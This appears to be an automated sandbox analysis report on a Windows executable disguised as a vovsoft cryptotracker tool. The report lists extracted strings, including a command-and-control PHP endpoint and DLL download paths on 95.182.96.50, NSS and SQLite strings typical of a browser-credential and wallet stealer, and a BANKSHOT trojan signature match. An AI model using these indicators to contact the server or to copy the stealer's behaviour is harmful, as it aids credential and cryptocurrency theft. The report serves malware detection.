Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpV
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpal
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpare
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpdus.wallet
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpge
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.0000000001205000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpl
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.00000000032E4000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpsition:
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpys
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/Fz
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/freebl3.dll
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/freebl3.dllrhy
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/mozglue.dll
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/msvcp140.dll
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/msvcp140.dllVh
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/nss3.dll
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/softokn3.dll
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.00000000031A1000.00000040.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/sqlite3.dll
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/fee3b98529eb4b43/vcruntime140.dll
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.00000000032E4000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.502aced82320799c96.phpsition:
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50l2
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 9JtNIXVedn.exe String found in binary or memory: http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
Source: 9JtNIXVedn.exe String found in binary or memory: http://ccsca2021.ocsp-certum.com05
Source: 9JtNIXVedn.exe String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: 9JtNIXVedn.exe String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: 9JtNIXVedn.exe String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: 9JtNIXVedn.exe String found in binary or memory: http://repository.certum.pl/ccsca2021.cer0
Source: 9JtNIXVedn.exe String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: 9JtNIXVedn.exe String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: 9JtNIXVedn.exe String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
Source: 9JtNIXVedn.exe String found in binary or memory: http://subca.ocsp-certum.com01
Source: 9JtNIXVedn.exe String found in binary or memory: http://subca.ocsp-certum.com02
Source: 9JtNIXVedn.exe String found in binary or memory: http://subca.ocsp-certum.com05
Source: 9JtNIXVedn.exe String found in binary or memory: http://vovsoft.com
Source: 9JtNIXVedn.exe String found in binary or memory: http://vovsoft.com/
Source: 9JtNIXVedn.exe String found in binary or memory: http://vovsoft.com/blog/how-to-activate-using-license-key/openU
Source: 9JtNIXVedn.exe String found in binary or memory: http://vovsoft.com/blog/how-to-uninstall-vovsoft-software/openU
Source: 9JtNIXVedn.exe String found in binary or memory: http://vovsoft.com/help/
Source: 9JtNIXVedn.exe String found in binary or memory: http://vovsoft.com/openU
Source: 9JtNIXVedn.exe String found in binary or memory: http://vovsoft.comopenS
Source: 9JtNIXVedn.exe String found in binary or memory: http://vovsoft.comopenU
Source: 9JtNIXVedn.exe String found in binary or memory: http://www.certum.pl/CPS0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: 9JtNIXVedn.exe String found in binary or memory: http://www.indyproject.org/
Source: 9JtNIXVedn.exe, 9JtNIXVedn.exe, 00000000.00000002.1691259038.000000006FF1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: 9JtNIXVedn.exe, 00000000.00000002.1689407695.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 9JtNIXVedn.exe String found in binary or memory: https://api.coingecko.com/api/v3/coins/
Source: 9JtNIXVedn.exe String found in binary or memory: https://api.coingecko.com/api/v3/coins/list
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: HIIIDAKKJJJKKECAKKJE.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr String found in binary or memory: https://support.mozilla.org
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
Source: 9JtNIXVedn.exe String found in binary or memory: https://vovsoft.com/blog/credits-and-acknowledgements/open
Source: 9JtNIXVedn.exe String found in binary or memory: https://vovsoft.com/translation/
Source: 9JtNIXVedn.exe String found in binary or memory: https://vovsoft.com/translation/openU
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
Source: 9JtNIXVedn.exe String found in binary or memory: https://www.certum.pl/CPS0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr String found in binary or memory: https://www.mozilla.org
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003173000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003173000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003173000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 9JtNIXVedn.exe, 00000000.00000003.1631643913.000000002DE6F000.00000004.00000020.00020000.00000000.sdmp, AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003173000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 9JtNIXVedn.exe, 00000000.00000003.1631643913.000000002DE6F000.00000004.00000020.00020000.00000000.sdmp, AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003173000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: 9JtNIXVedn.exe, 00000000.00000003.1631643913.000000002DE6F000.00000004.00000020.00020000.00000000.sdmp, AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

Source: 0.2.9JtNIXVedn.exe.3144ff7.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: String function: 6CEEDAE0 appears 59 times
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: String function: 6CEED930 appears 48 times
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: String function: 6CE99F30 appears 31 times
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: String function: 6CD89B10 appears 73 times
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: String function: 6CEE09D0 appears 267 times
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: String function: 6CD83620 appears 74 times
Source: 9JtNIXVedn.exe Static PE information: invalid certificate
Source: 9JtNIXVedn.exe Static PE information: Number of sections : 11 > 10
Source: 9JtNIXVedn.exe, 00000000.00000000.1373704928.0000000000B76000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamecryptotracker.exeP vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe, 00000000.00000000.1372749288.0000000000401000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe, 00000000.00000000.1372749288.0000000000401000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: \OriginalFileName vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe, 00000000.00000002.1690872692.000000006CF35000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe, 00000000.00000002.1657076285.0000000002BF8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamekernel32j% vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe, 00000000.00000002.1691379887.000000006FF32000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe Binary or memory string: OriginalFileName vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe Binary or memory string: \OriginalFileName vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe Binary or memory string: OriginalFilenamecryptotracker.exeP vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 0.2.9JtNIXVedn.exe.3144ff7.0.raw.unpack, type: UNPACKEDPE Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CDC0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 0_2_6CDC0300
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\2REHJVOY.htm Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 9JtNIXVedn.exe, 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
